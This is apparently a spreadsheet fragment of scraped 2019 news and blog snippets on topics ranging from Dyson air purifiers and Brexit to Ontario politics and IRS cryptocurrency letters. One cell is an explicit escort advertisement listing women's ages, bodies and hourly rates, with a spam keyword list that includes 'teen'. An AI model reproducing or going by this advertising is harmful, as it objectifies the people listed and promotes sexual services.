above, they have an amp that treats the air as it flows through. The bladeless design is easier to clean and can wiped down with a dry or damp cloth. 2. Quiet Operation The bladeless design also allows for quieter operation. Dyson Pure Cool TP04 air intake Dyson Pure Cool TP04 air intake Traditional fans vs. Dyson purifiers: Traditional fans make noise by constantly “chopping” the air as they rotate. In terms of air purifiers specifically, the rotating fans may be less relevant, as most purifiers do not double as fans, but its feels worth mentioning. 3. Dual Purpose: Purifier + Fan Dyson air purifiers all double as fans providing dual purpose within a single unit. This is unusual for most other air purifiers outside of the Dyson lineup. In addition to operating as a fan and a purifier, they also they also have the added bonus of offering models with heating and cooling (like the HP series) or just cooling only (like the TP series, DP series, or BP series). 4. App Control (via Dyson Link) Dyson Link technology is what makes your fan accessible from your smartphone. NOTE: It’s important to note than not all Dyson purifiers are compatible with app control, but all purifiers that ARE, rely on the Dyson Link app as the central control hub. Using the Link app, Dyson air purifiers are able to sense and report stats about the air quality in the room. When conditions dip below a certain level, the system will automatically turn on and the purifier will begin to treat the air. For reference, the Dyson Link app allows the following quick functions: Purifier Activity – Monitors air quality and recommends action with needed. Filter Life – Studies the quality of the filter and will let you know when it’s time to replace. Remote Control – Allows you to remotely control the air purifier without touching the actual unit. Check out the full Dyson air purifier review and comparison here: Connect with us here: Questions or comments? Drop us a comment down below or send us an email here: We are always happy to help! Modern Castle is supported by readers. When you buy with our links, we may earn a commission. Click the link below to learn more. Amazon.com Disclosure: As an Amazon Associate I earn from qualifying purchases. source The post Dyson Air Purifier Review: TP04 vs. TP02 vs. DP04 vs. HP04 vs. HP02 vs. BP01 appeared first on 4UTODAY Online since 2004.</t>
  </si>
  <si>
    <t>Touring a Japanese Convenient Store — Tokyo, Japan | The Travel Intern The post Touring a Japanese Convenient Store — Tokyo, Japan | The Travel Intern appeared first on Travel-Store.</t>
  </si>
  <si>
    <t>US shares fell the most in two months after Jerome Powell dented hopes the Fed is set to continue easing after its first interest-rate cut in over a decade.</t>
  </si>
  <si>
    <t>kajke</t>
  </si>
  <si>
    <t>Not sure how the Jackson nightlights compare to the OzB favourite Xiaomi but thought it worth posting based on saving. Product blurbs: Vertical style Featuring automatic on/off switching based on ambient light levels and a long-life low-power LED, this nightlight is ideal for use around the home to light children's bedrooms, hallways, bathrooms and more. Dome style Featuring automatic on/off switching based on ambient light levels and a long-life low-power LED, this nightlight is ideal for use around the home to light children's bedrooms, hallways, bathrooms and more. Additionally, this model features a rotatable lens to allow the light to be directed as needed.</t>
  </si>
  <si>
    <t>Beyond Blue founder Jeff Kennett has lashed out at disgraced MP Will Fowles: “This is an unacceptable use of mental health as an issue.”</t>
  </si>
  <si>
    <t>Most Republicans do not believe Mr Trump is a racist. This is why his recent remarks are so troubling to me, to people of colour and to many Trump supporters throughout the country, writes Mia Love.</t>
  </si>
  <si>
    <t>Samantha Hutchinson</t>
  </si>
  <si>
    <t>Political opponents were quick to comment it wasn’t the first time the Burwood MP had been noted for a 'crash, or crash through' mentality.</t>
  </si>
  <si>
    <t>Ari Suss, a senior executive who’s worked for trucking magnate Lindsay Fox for 15 years, is selling his Caulfield North family home.</t>
  </si>
  <si>
    <t>Megan Neil</t>
  </si>
  <si>
    <t>An advocacy group has called for action after further research demonstrated the overuse of antipsychotic drugs in aged care facilities.</t>
  </si>
  <si>
    <t>Lee Ryder</t>
  </si>
  <si>
    <t>The Sports Direct magnate has revealed he was not surprised to hear Benitez had opted for a big money salary in China This post written by Lee Ryder originally appeared on ChronicleLive - Newcastle United FC. Read the full post here. Source</t>
  </si>
  <si>
    <t>NASA astronaut Nick Hague took these awe-inspiring pictures of our home planet from the International Space Station . The post NASA news: Astronaut snaps breathtaking views of Earth from 250 miles in space appeared first on NoPartySystem.Com.</t>
  </si>
  <si>
    <t>Zoe Keenan</t>
  </si>
  <si>
    <t>Michael Worthington’s proposal was for a second-hand R2900G loader to be donated, rebuilt by volunteers and sold to another mining company, with proceeds going to local charities.</t>
  </si>
  <si>
    <t>Cate Campbell says the world titles played out like a TV melodrama, but head coach Jacco Verhaeren says it's nothing compared to what's coming in Tokyo</t>
  </si>
  <si>
    <t>Adam Carey</t>
  </si>
  <si>
    <t>Melbourne has lost almost 2000 hectares of tree cover in the past five years as suburban yards have been cleared of trees and open spaces turned into housing.</t>
  </si>
  <si>
    <t>Hugh Mackenzie</t>
  </si>
  <si>
    <t>Hugh Mackenzie Huntsville Doppler In the last provincial election, a little more than a year ago, I voted for Doug Ford. I did not vote for him in the leadership race. I voted for Christine Elliott, who by the way won the majority of votes. I can’t remember if it was a ranked ballot, but if it was he would have been my last choice. Nevertheless, when the election came around I voted for him. I could not vote for the NDP who have socialist tendencies and had a shot at winning the election. There was no way I was voting for the Liberals, who after more than a decade in power left us broke: a deficit of $15 billion, an almost insurmountable debt of $347 billion and an annual interest payment of $13 billion. Think what we could have done with that. I like some of the principles that the Green Party stands for, but they had no chance of affecting the balance of power in that election. And, so, I ended up voting for Doug Ford. I saw little choice other than staying home, which I have never done. There are some things that Doug Ford and I have in common. He believes in less rather than more government. So do I. He believes in reducing public debt and so do I. It boggles my mind that so many people in Ontario and, for that matter, Canada, recognize so strongly the threat of environmental issues to our future but ignore an equal threat to our future, of uncontrolled debt, that eventually will lead to an inability to provide basic services to people, such as health care, education and infrastructure. Ford also believes in strong fiscal management which means spending less public money than you take in, and so do I. I guess that is why I am a Conservative, although, unlike other partisans of all stripes, I am not afraid to call my party out when I think they are wrong. For these reasons, I was cautiously optimistic when the Ford Government won a majority a little more than a year ago. Whatever my concerns about Doug Ford, I knew he had a strong front bench with people like Christine Elliott, Caroline Mulroney and Rod Phillips. In addition, apart from politics, without personal experience with him, I found it somewhat hard to dislike the guy. He came across as affable, someone who really seems to care about people and has been, at least up to now, exceptionally accessible for a Premier. To me, he did not come across as arrogant or overly ego-driven. The problem, however, which overrides all of this, is that it became readily apparent that Premier Ford and some of his inner circle did not know the first thing about how to run a government or how government works. One of the early signs to me was a personal one. With the ink hardly dry on his appointment as Premier, the first thing Ford did was to cut the size of Toronto’s Council in half. There may have been legitimate reasons to do that in due course, but there was no consultation, no rationale and no plan for the consequences. It did not appear statesman-like. It appeared vindictive. And then to add insult to injury, he stuck one more knife into his political nemesis Patrick Brown by preventing him from running for election as Regional Chair of Peel. In order to do that, of course, he had to cancel every election at large of Regional Chairs in Ontario and that is when it became personal. I had filed to run in an election at large, for District (Regional) Chair in Muskoka. I had a strong platform to drastically reduce the cost, role and power of District government, which was, and still is, way out of control. We had done the polls. We knew I had a good chance of winning and my platform fit nicely with the Ford agenda. But it was not to be. The baby went out with the bathwater. Subsequently, the Ford Government seems to be working hard at pissing off people. Most of us know that the cost of government and therefore the services it offers has to be reduced. But the knee-jerk manner in which they have gone about it, has not worked. There has been little consultation, serious angst about important services being eliminated, such as financial help for autistic children, and little evidence that the real waste in government is being rooted out and done away with. A few days ago, the Toronto Star ran an editorial, the headline of which read, “Ford must rebuild trust”. The last thing the Star really wants is to see Doug Ford succeed, so of course they don’t mean it. But I do. There is still time for Doug Ford to stop acting like a kid in a candy store with his newfound power. He needs people around him who understand how government really works and not people who see their role as rewarding their friends and attempting to destroy their enemies. Doug Ford has a mandate to reduce the cost of government and to get the Provincial debt under control. He still has time to do that, but he desperately needs a transparent plan that the people who voted for him, and agreed with his priorities, can support. To me, instead of ad hoc cuts here and there, with little cohesion and even less explanation, he needs to take another route. The Government needs to require every single Ministry to find a percentage, say from five to 10 per cent, of waste and unnecessary programs, Tribunals and commissions and so on that no longer have any real purpose. Some of the bureaucrats, who never want to give up anything, will inevitably come back with cuts to essential services to embarrass the Government. But Ford must push back and dig deeper than that. Anyone who has worked in government, including myself, knows there is waste, duplication, programs that no longer serve the public interest and sometimes an unwillingness to find better and more cost-efficient ways to do things differently. If Premier Ford is really serious about reducing the cost of Government, and I have to believe he is, he needs to find those things and get rid of them. He has people in his Cabinet who know how to help him to do just that. Ford also needs to be bold, especially when it comes to our unmanageable debt. No one likes taxes and increasing them is clearly a political risk. But our Provincial debt will not go away without extraordinary measures and it must be dealt with. Perhaps a special, time-limited tax is in order with proceeds to be directed solely to debt reduction and nothing else. Legislation forbidding deficits except under extraordinary circumstances would also be helpful. So, the question remains, is it too late for Doug Ford? I would like to see him succeed because many of the things he stands for are things I believe to be important. Can he do it? Only time will tell. And time is quickly running out. Don’t miss out on Doppler! Sign up for our free newsletter here. Like The post Listen Up! Is it too late for Doug Ford? appeared first on Huntsville Doppler.</t>
  </si>
  <si>
    <t>personal injury lawyer arizona</t>
  </si>
  <si>
    <t>Pinned onto Uncategorized The Role of a Personal Injury Attorney: Everything you need to know. #Phoenix #Arizona Keep Reading: – www.zacharlawblog… Source by zacharlawfirmaz</t>
  </si>
  <si>
    <t>Suzannah Lyons</t>
  </si>
  <si>
    <t>The majority of us think we're better than the average person. But what drives this overconfidence, and is it a help or a hindrance?</t>
  </si>
  <si>
    <t>Harland and Wolff workers say they have a rota to ensure their protest continues around the clock. Read more? Click here</t>
  </si>
  <si>
    <t>Experience Sever looking for part time Work….have experience Serving and some Bartending. Am very reliable , friendly, honest, and really love people. I have a full time job but would like to work just a bit more. Two evenings a week would be amazing…. Can work every night except Fridays. Please call 227 6745. Thank .. Read more</t>
  </si>
  <si>
    <t>Guadeloupe Road Trip The post Guadeloupe Road Trip appeared first on Travel-Store.</t>
  </si>
  <si>
    <t>Lance Franklin will miss at least another two games after a setback in his recovery from a hamstring injury.</t>
  </si>
  <si>
    <t>One card, millions of ways to enjoy it. Use the App Store &amp; iTunes Gift Card to get apps, games, music, movies and TV shows. Available in a variety of denominations, spend it on in-app content, books, TV show subscriptions or even iCloud storage to secure files from all your Apple devices.</t>
  </si>
  <si>
    <t>Star Wars: Angriff der Klonkrieger</t>
  </si>
  <si>
    <t>https://bit.ly/2PctE6V For the first time ever on digital, watch the seeds of Anakin Skywalker’s transformation take root in Star Wars: Attack of the Clones. Ten years after the invasion of … source</t>
  </si>
  <si>
    <t>(CNN) — You’ve probably heard the moon described as looking like it’s made of cheese, but a team of artists in Ohio took the dairy connection to the next level. As part of the longstanding annual butter sculpture tradition at the Ohio State Fair, located in the state capital of Columbus, Cincinnati artist Paul Brooke and a team of sculptors paid homage to the 50th anniversary of the Apollo 11 moon landing by making life-size, butter sculptures of the astronauts involved in the mission. Part of a series of butter sculptures — made out of more than 2,000 pounds of creamy goodness — one work features the three Apollo 11 astronauts — Neil Armstrong, Michael Collins and Buzz Aldrin. Neil Armstrong saluting the American flag and the famous footprint left on the surface of the moon are also recreated with butter. Paul Brooke and a team of sculptors paid homage to the 50th anniversary of the Apollo 11 moon landing. The scupltures are made of butter. courtesy Ohio. Find it Here. “The space suits were a real challenge, to be honest. It’s easy to sculpt things that you know. When you sculpt a human being you memorize it, so this was a challenge,” Alexander Balz, one of the artists involved in the project, told CNN affiliate NBC4 WCMH-TV. The American Dairy Association Mideast collaborated with the fair to commemorate the role that Ohio played in the world-famous mission. After all, Armstrong himself was born in Wapakoneta, Ohio, and raised in various towns across the state before leaving to explore outer space. The beloved local tradition began with a focus on sculpting a cow and calf that honored the dairy industry in the state, so of course two striking Ohioan cows are also present in this year’s display case. The cow and calf tradition dates back 116 years to 1903. For the first time, the cows are sporting ear tags frequently seen on the real-life animals. On one the word “Apollo” has been engraved, and on the other the number “11.” But the Apollo 11 mission is not the only anniversary that the fair has recognized. In the past, tributes to the Olympics, the anniversary of the ice cream cone and several famous Ohioans have all been commemorated in butter form. If you’re worried about what happens to the thousands of pounds of butter used every year, fear not. The fair exclusively uses butter that is past its expiration date for the carving and recycles it for use in biodiesel fuel and cosmetics upon the display’s conclusion. The Ohio State Fair runs through August 4. Visitors can purchase tickets on the fair’s website ahead of time to enjoy the unique works of art and the rest of the attractions. Apollo 11 astronauts receive buttery tribute at Ohio State Fair The post Apollo 11 astronauts receive buttery tribute at Ohio State Fair appeared first on Travel-Store.</t>
  </si>
  <si>
    <t>Welcome to escorts in Folly Green CM77, covering the whole area of Essex. We have escorts serving the flats, homes and local hotels in Folly Green and the surrounding Essex areas. Folly Green Escort Essex Escort Services Folly Green Escorts - Girls Who Know How to Fulfill You in Essex Folly Green escorts are known in Essex for a wide variety of reasons. The first reason for its popularity is its beauty. The second reason is their skills when it comes to massages. When you are in the area, you will have to walk around a lot if you are a visitor and want to explore the city. After walking around this much, it is not surprising that your legs would be hurting and your body would need some pampering. You can book the services of one of these women and allow them to give you a soothing massage. If you want, you can even enjoy an erotic massage. To achieve your dreams, you should continuously look for various options to realize them. One of the options where you can shine is when there is an important even like annual office day, or your company has organized a special event where a lot of visitors are visiting your office from different branches. To impress your superiors and bosses, you might want to suggest them a great idea of hiring Folly Green escorts for the guests visiting in the company event. Your guests will surely be impressed and would feel esteemed when they would meet these stunning escort girls. Hiring the services of these Folly Green escort girls will surely turn out to be great since these stunning beauties will cater to the needs of the visitors and make your guests feel outstanding and comfortable at the same time. After the party, you can request for exceptional massage service for these visitors or guests. These escorts have a talent, and they want to be appreciated for it. With these ladies, you can finally be a man that you always wanted to be. These Folly Green escorts will bring out several qualities in you which will leave you pleasantly surprised. Age is just in mind and, it doesn’t matter anyway when you are with these women. There are quite a lot of men who feel depressed as they get older since they think that their years of fun are over for good. They believe that with age, they would no longer be able to enjoy the companionship of women at all. However, now you can not just enjoy being with Folly Green women, but you can be with sexy, hot, young women who would make you grow wild with desire. Escort Name: Chanel Location: Folly Green (CM77 8) Nationality: Australian Spoken Language: English, German Age: 20 years old Weight: 46.4kg (102lb) (7st - 4lb) Height: 5 feet 6 inches (167.74cm) Dress Size: M Shoe Size: 45 Hair Leigh: Long Hair Color: Driftwood Lights Eye Color: Violet Breast: Natural Breast Size: C Pubic Hair: Shaved Completely Tattooed: No Piercings: No Smoking: Occasionally Drinking: No Availability Area: Folly Green Outcall: Essex Incall Rates Start: from £100 p/h Outcall Rates Start: from £120 p/h Book Chanel Escort Name: Ursula Location: Folly Green (CM77 8) Nationality: Welsh Spoken Language: English, Dutch Age: 23 years old Weight: 45.9kg (101lb) (7st - 3lb) Height: 5 feet 6 inches (167.74cm) Dress Size: S Shoe Size: 43 Hair Leigh: Medium-Length Hair Color: Contrast Melt Eye Color: Hazel Breast: Natural Breast Size: C Pubic Hair: All Natural Tattooed: No Piercings: No Smoking: No Drinking: Yes Availability Area: Folly Green Outcall: Essex Incall Rates Start: from £100 p/h Outcall Rates Start: from £120 p/h Book Ursula Escort Name: Adrena Location: Folly Green (CM77 8) Nationality: Danish Spoken Language: English, Spanish Age: 24 years old Weight: 67.3kg (148lb) (10st - 8lb) Height: 5 feet 8 inches (172.72cm) Dress Size: M Shoe Size: 36 Hair Leigh: Medium-length Hair Color: Salt And Pepper Eye Color: Brown Breast: Natural Breast Size: B Pubic Hair: Shaved Mostly Tattooed: No Piercings: Yes Smoking: No Drinking: No Availability Area: Folly Green Outcall: Essex Incall Rates Start: from £100 p/h Outcall Rates Start: from £120 p/h Book Adrena Escort Name: Anais Location: Folly Green (CM77 8) Nationality: Scottish Spoken Language: English, Latvian Age: 23 years old Weight: 60.0kg (132lb) (9st - 6lb) Height: 5 feet 5 inches (165.10cm) Dress Size: S Shoe Size: 43 Hair Leigh: Medium-Length Hair Color: Red Eye Color: Gray Breast: Natural Breast Size: C Pubic Hair: Trimmed Tattooed: Yes Piercings: No Smoking: Occasionally Drinking: No Availability Area: Folly Green Outcall: Essex Incall Rates Start: from £100 p/h Outcall Rates Start: from £120 p/h Book Anais Escort Name: Cher Location: Folly Green (CM77 8) Nationality: British Spoken Language: English, Greek Age: 20 years old Weight: 51.4kg (113lb) (8st - 1lb) Height: 5 feet 8 inches (172.72cm) Dress Size: M Shoe Size: 37 Hair Leigh: Medium-Length Hair Color: Salt And Pepper Eye Color: Brown Breast: Natural Breast Size: B Pubic Hair: Trimmed Tattooed: No Piercings: Yes Smoking: Yes Drinking: No Availability Area: Folly Green Outcall: Essex Incall Rates Start: from £100 p/h Outcall Rates Start: from £120 p/h Book Cher Escort Name: Gaynor Location: Folly Green (CM77 8) Nationality: Swiss Spoken Language: English, Polish Age: 28 years old Weight: 55.9kg (123lb) (8st - 11lb) Height: 5 feet 9 inches (175.26cm) Dress Size: L Shoe Size: 39 Hair Leigh: Long Hair Color: Blonde Eye Color: Green Breast: Natural Breast Size: B Pubic Hair: Trimmed Tattooed: Yes Piercings: No Smoking: No Drinking: Occasionally Availability Area: Folly Green Outcall: Essex Incall Rates Start: from £100 p/h Outcall Rates Start: from £120 p/h Book Gaynor Folly Green Best Escort, Folly Green Incall Escort, Folly Green Spanish Escort, Folly Green Erotic Escort, Folly Green French Escort, Folly Green Asian Escort, Folly Green Busty Escort, Folly Green Irish Escort, Folly Green Polish Escort, Folly Green Mature Escort, Folly Green Indian Escort, Folly Green Gay Escort, Folly Green British Escort, Folly Green Scottish Escort, Folly Green Walsh Escort, Folly Green Porn Escort, Folly Green Blonde Escort, Folly Green Brunette Escort, Folly Green Massage Escort, Folly Green Ebony Escort, Folly Green Female Escort, Folly Green Cheap Escort, Folly Green Brazilian Escort, Folly Green Outcall Escort, Folly Green Young Escort, Folly Green Indian Escort, Folly Green Black Escort, Folly Green Male Escort, Folly Green Chinese Escort, Folly Green Horny Escort, Folly Green Agency Escort, Folly Green Teen Escort, Folly Green Independent Escort, Folly Green Bisexual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Folly Green appeared first on Escort Info UK.</t>
  </si>
  <si>
    <t>Victoria needs a decentralisation strategy to take pressure off the city and grow our regional centres.</t>
  </si>
  <si>
    <t>Alberta's largest union says a judge has ruled that wage arbitration hearings for ten of thousands of public sector workers can go ahead sooner rather than later.</t>
  </si>
  <si>
    <t>My First Trip To India! The post My First Trip To India! appeared first on Travel-Store.</t>
  </si>
  <si>
    <t>By MATT GARDNER July 13, 2019 Primate Fred Hiltz and officers of General Synod share a tense moment of silence before results are revealed. Photo: Matthew Townsend The Anglican Church of Canada will maintain its traditional definition of marriage after a vote to amend the marriage canon failed to pass at General Synod 2019. … Continue reading "Marriage canon amendment fails to pass at General Synod" The post Marriage canon amendment fails to pass at General Synod appeared first on Anglican Church of Canada - CEP online.</t>
  </si>
  <si>
    <t>This is a Philips MASTER TL-D 18W/827 – An 2 Foot 18w T8 fluorescent tube in colour 827 – extra warm White. This lamp has an average life of 20,000 hours. Manufacturers Part No (where applicable) : 631626 40 This Philips product is available for just £2.75 at LampShopOnline Ltd</t>
  </si>
  <si>
    <t>The then head of Purana, Detective Inspector Jim O’Brien, told him: “I have your life in my hand. You can do eight years or life. The choice is yours.”</t>
  </si>
  <si>
    <t>Debian Linux Security Advisory 4489-1 – Imre Rad discovered several vulnerabilities in GNU patch, leading to shell command injection or escape from the working directory and access and overwrite files, if specially crafted patch files are processed. Published at: July 28, 2019 at 08:32PM View on Packet Storm The post Debian Security Advisory 4489-1 appeared first on Secured Me.</t>
  </si>
  <si>
    <t>Dutch Lao Dictionary – travel dictionary to translate Dutch to Lao. Click on the list to show Dutch or Lao synonyms to understand the broader use of the words. The learning games help to build vocabulary. View the history of words used in the game again clickable for synonyms. Ideal for travelers, business people or … Continue reading Dutch Lao Dictionary →</t>
  </si>
  <si>
    <t>Gavin Cordon, Sam Blewett, Shaun Connolley and Georgina Stubbs</t>
  </si>
  <si>
    <t>The EU's chief negotiator Michel Barnier says new British PM Boris Johnson's demands to renegotiate the Brexit deal are "unacceptable", as the jockeying begins.</t>
  </si>
  <si>
    <t>The Northern Echo | Newcastle</t>
  </si>
  <si>
    <t>THIS was not an arrival to compare with a certain Michael Owen’s arrival at St James’ Park 14 years ago, but then that was not a purchase that worked out for Newcastle United. This post written by The Northern Echo | Newcastle originally appeared on The Northern Echo | Newcastle. Read the full post here. Source</t>
  </si>
  <si>
    <t>Armenian German Dictionary – travel dictionary to translate Armenian to German. Click on the list to show Armenian or German synonyms to understand the broader use of the words. The learning games help to build vocabulary. View the history of words used in the game again clickable for synonyms. Ideal for travelers, business people or … Continue reading Armenian German Dictionary →</t>
  </si>
  <si>
    <t>The San Antonio Spurs officially hired Tim Duncan as an assistant coach Monday, “returning the favor” to head coach Gregg Popovich. Source: Sports Business News</t>
  </si>
  <si>
    <t>billevans</t>
  </si>
  <si>
    <t>When you trade through the Commsec Pocket app, you’ll pay $2 each time you invest or sell up to $1,000. Trades over $1,000 are charged at 0.20% of the trade value. For example, a $1,100 trade will cost you $2.20 ($1,100 x 0.20%) Seems to be CHESS sponsored from with I'm reading. Cons: Limited ETFs selection. ETFs Available On Commsec Pocket: IOZ iShares Core S&amp;P/ASX 200 ETF IOO iShares Global 100 ETF IEM iShares MSCI Emerging Markets ETF SYI SPDR MSCI Australia Select High Dividend Yield Fund NDQ BetaShares NASDAQ 100 ETF ETHI BetaShares Global Sustainability Leaders ETF IXJ iShares Global Healthcare ETF For me: Use Commsec Pocket for trades &lt; $4750 Use Selfwealth for trades &gt; $4750</t>
  </si>
  <si>
    <t>https://bit.ly/2PctE6V (Part 6) how to make online shopping website in wordpress l how to edit eCommerce theme . source</t>
  </si>
  <si>
    <t>The UK’s main air navigation service said it was dealing with a technical problem with a system at an air traffic control center in Swanwick, southern England, which was causing the flight restrictions. “We are doing all we can to fix it as soon as possible,” National Air Traffic Services (NATS) said in a statement Friday. Heathrow and Gatwick, the UK’s first and second busiest airports, respectively, both confirmed to CNN they had been experiencing limitations to their operations due to the air traffic control problem. “Flights continue to arrive and depart from Gatwick however NATS — which controls UK airspace — currently has an issue with one of its radars and has put limits on the number of flights that can use Gatwick and other London airports,” Gatwick Airport said in a statement. Heathrow, which saw a record-breaking 37.9 Celsius (100 degrees Fahrenheit) yesterday, said: “Flights are currently arriving and departing at Heathrow, and we are supporting NATS to resolve the issue as quickly as possible. We apologise to passengers for any disruption that occurs as a result.” Stansted and Luton airports said their services were unaffected. Flights are not the only mode of transport that’s been interrupted this week in the UK. Rail services also suffered extensive delays due to the heat wave, which sent temperatures soaring to a record-high for July Thursday. The owner of most of Britain’s railway network warned that train tracks could buckle under the extreme heat, as the steel tracks were expected to exceed 50 Celsius (122 degrees Fahrenheit) in and around London. Britain’s railway tracks are able to cope with up to 27 Celsius (80 degrees Fahrenheit), the average summer rail temperature in the UK. Radar issue disrupts flights at London Heathrow and Gatwick airports The post Radar issue disrupts flights at London Heathrow and Gatwick airports appeared first on Travel-Store.</t>
  </si>
  <si>
    <t>WASHINGTON, DC -Internal Revenue Service sign at the IRS Building in Washington, DCGetty Earlier this month, the IRS offshore compliance unit in Austin, Texas started sending letters to taxpayers it apparently suspects of underreporting their cryptocurrency income. The letter is clearly intended to scare the recipients into action and threatens "future civil and criminal enforcement activity" if the recipients don't amend their tax returns to accurately report their cryptocurrency related income. Here's an excerpt from the letter: Excerpt from IRS Letter 6174-ATyson Cross The rest of letter provides instructions to the recipients on how to report cryptocurrency related income and amend their tax returns, if necessary. Letter 6174-A is probably being sent to most Coinbase customers, not just suspected tax cheats IRS Letter 6174-A has all the markings of a generic mailing campaign, and not a personally targeted enforcement action. Although it's possible the IRS used its document matching program to identify suspected tax cheats and send them this letter, that doesn't seem to be the case. It's much more likely that the IRS is sending this letter to all 14,000 taxpayers identified by the 2017 Coinbase summons as part of a broader effort to encourage voluntary compliance. In fact, such an effort would be right on time as it's now been one year this month since the IRS first announced its cryptocurrency compliance campaign. Anecdotally, more than a dozen of my own clients have received this letter, all of whom accurately reported their cryptocurrency related income on their tax return. I've also heard from several other tax professionals who say their clients also received the letter despite having accurately reported all of their crypto income. This would seem to indicate the IRS is sending these letters to taxpayers as a fishing attempt without any real belief that each recipient has under-reported. ﻿If you accurately reported your crypto income, don't panic. You might receive IRS Letter 6174-A even if you accurately reported all of your cryptocurrency related income. In that case, don't panic. You likely received the letter just by nature of having a Coinbase account and not because you're a suspected tax cheat. It would still be a good idea, though, to review your tax return closely and make sure your cryptocurrency income is accurately reported. After all, receiving IRS Letter 6174-A unfortunately means you're on the IRS's radar one way or the other. And remember, IRS Letter 6174-A specifically says that no response is necessary if you already reported your cryptocurrency income. So, don't stress about calling the IRS or replying to the letter to tell them your tax return is already correct. What to do if your tax return isn't accurate If you failed to accurately report your cryptocurrency income, you should strongly consider following the instructions in the letter and amending your tax return as soon as possible. Remember, the IRS rarely prosecutes taxpayers who come clean before getting caught. So, don't skip on amending your tax return just because you're afraid it will get you into more trouble. Either way, you should consult with a lawyer to evaluate your options and make a decision on the best course of action. Keep in mind that accountants and CPAs do not have the benefit of attorney-client privilege, so you should not discuss this issue with your regular tax return preparer if there's a possibility your failure to report was criminal in nature."&gt; WASHINGTON, DC -Internal Revenue Service sign at the IRS Building in Washington, DC Getty Earlier this month, the IRS offshore compliance unit in Austin, Texas started sending letters to taxpayers it apparently suspects of underreporting their cryptocurrency income. The letter is clearly intended to scare the recipients into action and threatens “future civil and criminal enforcement activity” if the recipients don’t amend their tax returns to accurately report their cryptocurrency related income. Here’s an excerpt from the letter: Excerpt from IRS Letter 6174-A Tyson Cross The rest of letter provides instructions to the recipients on how to report cryptocurrency related income and amend their tax returns, if necessary. Letter 6174-A is probably being sent to most Coinbase customers, not just suspected tax cheats IRS Letter 6174-A has all the markings of a generic mailing campaign, and not a personally targeted enforcement action. Although it’s possible the IRS used its document matching program to identify suspected tax cheats and send them this letter, that doesn’t seem to be the case. It’s much more likely that the IRS is sending this letter to all 14,000 taxpayers identified by the 2017 Coinbase summons as part of a broader effort to encourage voluntary compliance. In fact, such an effort would be right on time as it’s now been one year this month since the IRS first announced its cryptocurrency compliance campaign. Anecdotally, more than a dozen of my own clients have received this letter, all of whom accurately reported their cryptocurrency related income on their tax return. I’ve also heard from several other tax professionals who say their clients also received the letter despite having accurately reported all of their crypto income. This would seem to indicate the IRS is sending these letters to taxpayers as a fishing attempt without any real belief that each recipient has under-reported. ﻿If you accurately reported your crypto income, don’t panic. You might receive IRS Letter 6174-A even if you accurately reported all of your cryptocurrency related income. In that case, don’t panic. You likely received the letter just by nature of having a Coinbase account and not because you’re a suspected tax cheat. It would still be a good idea, though, to review your tax return closely and make sure your cryptocurrency income is accurately reported. After all, receiving IRS Letter 6174-A unfortunately means you’re on the IRS’s radar one way or the other. And remember, IRS Letter 6174-A specifically says that no response is necessary if you already reported your cryptocurrency income. So, don’t stress about calling the IRS or replying to the letter to tell them your tax return is already correct. What to do if your tax return isn’t accurate If you failed to accurately report your cryptocurrency income, you should strongly consider following the instructions in the letter and amending your tax return as soon as possible. Remember, the IRS rarely prosecutes taxpayers who come clean before getting caught. So, don’t skip on amending your tax return just because you’re afraid it will get you into more trouble. Either way, you should consult with a lawyer to evaluate your options and make a decision on the best course of action. Keep in mind that accountants and CPAs do not have the benefit of attorney-client privilege, so you should not discuss this issue with your regular tax return preparer if there’s a possibility your failure to report was criminal in nature.</t>
  </si>
  <si>
    <t>Source: https://www.theverge.com/2019/7/23/20707690/google-nest-hub-max-smart-display-release-date-september-9 Google’s Nest Hub Max will be released on September 9th Photo by Vjeran Pavic / The Verge Google’s largest smart display yet, the Nest Hub Max, will launch on September 9th in the United States, United Kingdom, and Australia. The Hub Max was announced back at Google I/O, which was also where Google formally announced that it would rebrand its smart home products under the Nest name. The $229 device has a 10-inch display — significantly bigger than the existing Nest Hub. Like that product, the Max automatically adjusts its screen’s white balance to give the illusion that you’re looking at printed paper whenever your photos are being displayed. You can watch YouTube, pull up recipes, stream TV from YouTube TV, and control your smart home gadgets with the Hub, among other things. Personally, I think the 10-inch size should… Continue reading… Source: https://www.theverge.com/2019/7/23/20707690/google-nest-hub-max-smart-display-release-date-september-9 The post Google’s Nest Hub Max will be released on September 9th appeared first on CYBERDEN.</t>
  </si>
  <si>
    <t>Ross Gittins</t>
  </si>
  <si>
    <t>You could be forgiven for being unsure about the new proposals surrounding super.</t>
  </si>
  <si>
    <t>This content originally appeared on diaTribe. Republished with permission.By Jeemin Kwon and Martin Kurian A recent study found 38% of those with type 1 diagnosed after age 30 were not initially given insulin; learn ways Read more… The post Could I Have Been Misdiagnosed? Do I Have Type 1 or Type 2 Diabetes? appeared first on Equalibras.</t>
  </si>
  <si>
    <t>Jennifer Duke</t>
  </si>
  <si>
    <t>A senior Singtel Optus executive has slammed rival Telstra chief executive Andy Penn for attacking the National Broadband Network's pricing.</t>
  </si>
  <si>
    <t>Go to any open-for-inspection or display home and chances are you’ll see white subway tiles in the kitchen or bathroom.</t>
  </si>
  <si>
    <t>Download &amp; stream: http://defct.de/DFTD585D. As certain as the sun setting across San Antonio Bay each night, throughout every Ibiza season there is a record that becomes the track of the summer. This year Roberto Surace’s ‘Joys’ is that track. Championed by legendary Ibiza heavyweight Marco Carola for some time now, as well as island tastemakers […] The post Roberto Surace – Joys (Radio Edit) appeared first on Dubster.</t>
  </si>
  <si>
    <t>Javid to ramp up funding for no-deal Brexit preparations – paper Original Source Britain’s new Chancellor Sajid Javid speaks to the media as he arrives at the treasury in London, Britain, July 24, 2019. Matt Dunham/Pool via REUTERS LONDON (Reuters) – New British finance minister Sajid Javid plans to announce spending of around 1 billion pounds to make sure the country is properly prepared for a possible no-deal Brexit in October, a newspaper reported. Javid told the Sunday Telegraph he would overhaul the British Treasury’s approach to Brexit, starting with “significant extra funding” announcements in the coming days to get Britain fully ready to leave the European Union on Oct. 31, with or without a deal. The extra spending would include financing a major public information campaign for individuals and businesses. The Sunday Telegraph also quoted Javid as saying he had plans for 500 new Border Force officers and possible new infrastructure around the country’s ports. Javid’s predecessor Philip Hammond, who opposed leaving the EU without a transition deal, was accused by Brexit supporters of failing to spend enough money to get Britain ready for a no-deal Brexit, undermining its negotiating position with Brussels. Prime Minister Boris Johnson has said he wants to rework the Brexit deal that former leader Theresa May struck with the EU but he also says he is prepared to take Britain out of the bloc without one on Oct. 31, if necessary. Writing by William Schomberg; Editing by Daniel Wallis Our Standards:The Thomson Reuters Trust Principles. Follow us on Twitter Original Source The post Javid to ramp up funding 